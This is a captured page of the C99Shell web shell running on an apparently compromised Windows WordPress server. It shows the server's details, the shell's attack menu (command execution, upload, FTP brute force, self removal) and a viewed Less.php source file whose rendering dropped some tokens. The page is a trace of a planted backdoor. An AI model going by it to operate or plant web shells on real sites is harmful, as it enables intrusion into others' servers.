!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\plugins\wcp-contact-form\vendor\oyejorge\less.php\lib\Less\Tree\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.44%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Operation.php (1.38 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * Operation
 *
 * @package Less
 * @subpackage tree
 */
class Less_Tree_Operation extends Less_Tree{

    public 
$op;
    public 
$operands;
    public 
$isSpaced;
    public 
$type 'Operation';

    
/**
     * @param string $op
     */
    
public function __construct($op$operands$isSpaced false){
        
$this->op trim($op);
        
$this->operands $operands;
        
$this->isSpaced $isSpaced;
    }

    public function 
accept($visitor) {
        
$this->operands $visitor->visitArray($this->operands);
    }

    public function 
compile($env){
        
$a $this->operands[0]->compile($env);
        
$b $this->operands[1]->compile($env);


        if( 
Less_Environment::isMathOn() ){

            if( 
$a instanceof Less_Tree_Dimension && $b instanceof Less_Tree_Color ){
                
$a $a->toColor();

            }elseif( 
$b instanceof Less_Tree_Dimension && $a instanceof Less_Tree_Color ){
                
$b $b->toColor();

            }

            if( !
method_exists($a,'operate') ){
                throw new 
Less_Exception_Compiler("Operation on an invalid type");
            }

            return 
$a->operate$this->op$b);
        }

        return new 
Less_Tree_Operation($this->op, array($a$b), $this->isSpaced );
    }


    
/**
     * @see Less_Tree::genCSS
     */
    
public function genCSS$output ){
        
$this->operands[0]->genCSS$output );
        if( 
$this->isSpaced ){
            
$output->add" " );
        }
        
$output->add$this->op );
        if( 
$this->isSpaced ){
            
$output->add' ' );
        }
        
$this->operands[1]->genCSS$output );
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--